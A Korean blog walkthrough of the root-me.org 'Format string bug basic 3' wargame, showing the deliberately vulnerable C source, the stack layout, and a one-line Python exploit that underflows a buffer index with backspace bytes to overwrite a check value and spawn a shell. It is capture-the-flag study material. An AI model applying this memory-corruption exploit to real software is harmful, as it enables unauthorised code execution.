반응형
root-me.org [APP - SYSTEM]
ELF x86 - Format string bug basic 3 풀이
문제 소스 :
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 | /* gcc -m32 -o ch16 ch16.c */ #include <stdio.h> #include <sys/time.h> #include <sys/types.h> #include <unistd.h> void shell(void); int main() { char buffer[64]; int check; int i = 0; int count = 0; printf("Enter your name: "); fflush(stdout); while(1) { if(count >= 64) printf("Oh no...Sorry !\n"); if(check == 0xbffffabc) shell(); else { read(fileno(stdin),&i,1); switch(i) { case '\n': printf("\a"); break; case 0x08: count--; printf("\b"); break; case 0x04: printf("\t"); count++; break; case 0x90: printf("\a"); count++; break; default: buffer[count] = i; count++; break; } } } } void shell(void) { system("/bin/dash"); } | cs |
40행의 count--;을 이용해서 -4까지 땡긴 후 0xbffffabc를 넣어주면 된다.
check[0] check[1] check[2] check[3]
buffer[-4] buffer[-3] buffer[-2] buffer[-1] buffer[0] buffer[1] ....
exploit
(python -c 'print "\x08"*4+"\xbc\xfa\xff\xbf"'; cat) | ./ch16
반응형